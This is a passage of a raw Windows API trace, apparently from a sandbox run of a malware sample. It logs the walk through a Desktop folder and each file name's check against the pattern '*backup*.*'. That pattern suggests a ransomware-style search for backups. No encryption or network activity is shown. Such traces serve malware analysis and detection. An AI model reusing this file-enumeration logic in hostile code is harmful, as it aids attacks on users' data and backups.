PathMatchSpecW (pszFile="ws8IgIZUQH.mkv", pszSpec="*backup*.*") returned 0 [0110.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0110.908] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.908] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.908] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\" [0110.908] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.908] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\p B1LdDcHaeS" | out: lpString1="\\p B1LdDcHaeS") returned="\\p B1LdDcHaeS" [0110.908] lstrcatW (in: lpString1="\\p B1LdDcHaeS", lpString2="\\" | out: lpString1="\\p B1LdDcHaeS\\") returned="\\p B1LdDcHaeS\\" [0110.908] lstrcatW (in: lpString1="\\p B1LdDcHaeS\\", lpString2="Y_Iia0ILxn.gif" | out: lpString1="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif") returned="\\p B1LdDcHaeS\\Y_Iia0ILxn.gif" [0110.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2978 [0110.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2978, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a28e8 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.909] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*backup*.*") returned 0 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a28e8 | out: hHeap=0x29a0000) returned 1 [0110.909] FindNextFileW (in: hFindFile=0x743520, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.909] FindClose (in: hFindFile=0x743520 | out: hFindFile=0x743520) returned 1 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.909] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.910] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*backup*.*") returned 0 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.910] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.910] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.910] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.910] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif" [0110.910] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.910] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.910] lstrcatW (in: lpString1="\\", lpString2="PKW-syaNOG91rV.gif" | out: lpString1="\\PKW-syaNOG91rV.gif") returned="\\PKW-syaNOG91rV.gif" [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea458 [0110.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x38ea458, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d20 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea458 | out: hHeap=0x29a0000) returned 1 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970bc0 [0110.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970bc0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.910] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970bc0 | out: hHeap=0x29a0000) returned 1 [0110.910] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*backup*.*") returned 0 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.910] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d20 | out: hHeap=0x29a0000) returned 1 [0110.910] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.910] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.911] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.911] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv" [0110.911] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.911] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.911] lstrcatW (in: lpString1="\\", lpString2="QjzdslaoFnrvJ.flv" | out: lpString1="\\QjzdslaoFnrvJ.flv") returned="\\QjzdslaoFnrvJ.flv" [0110.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea6d8 [0110.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x38ea6d8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2bb8 [0110.911] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea6d8 | out: hHeap=0x29a0000) returned 1 [0110.911] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d00 [0110.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d00, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.911] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.911] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*backup*.*") returned 0 [0110.911] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.911] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.911] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.911] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.911] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.911] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4" [0110.911] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.912] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.912] lstrcatW (in: lpString1="\\", lpString2="QqfcEGsF2dGoVC.mp4" | out: lpString1="\\QqfcEGsF2dGoVC.mp4") returned="\\QqfcEGsF2dGoVC.mp4" [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea918 [0110.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x38ea918, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2df8 [0110.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0110.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d80 [0110.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970d80, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d80 | out: hHeap=0x29a0000) returned 1 [0110.912] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*backup*.*") returned 0 [0110.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0110.912] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.912] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.912] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.912] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a" [0110.912] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.912] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.912] lstrcatW (in: lpString1="\\", lpString2="SSkrbDuTIF.m4a" | out: lpString1="\\SSkrbDuTIF.m4a") returned="\\SSkrbDuTIF.m4a" [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970dc0 [0110.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=11, lpWideCharStr=0x3970dc0, cchWideChar=11 | out: lpWideCharStr="*backup*.*") returned 11 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.913] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*backup*.*") returned 0 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.913] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0508 | out: hHeap=0x29a0000) returned 1 [0110.913] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.913] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.913] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.913] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a" [0110.913] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.913] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.913] lstrcatW (in: lpString1="\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="\\StgqeHlfrw0.m4a") returned="\\StgqeHlfrw0.m4a" [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, 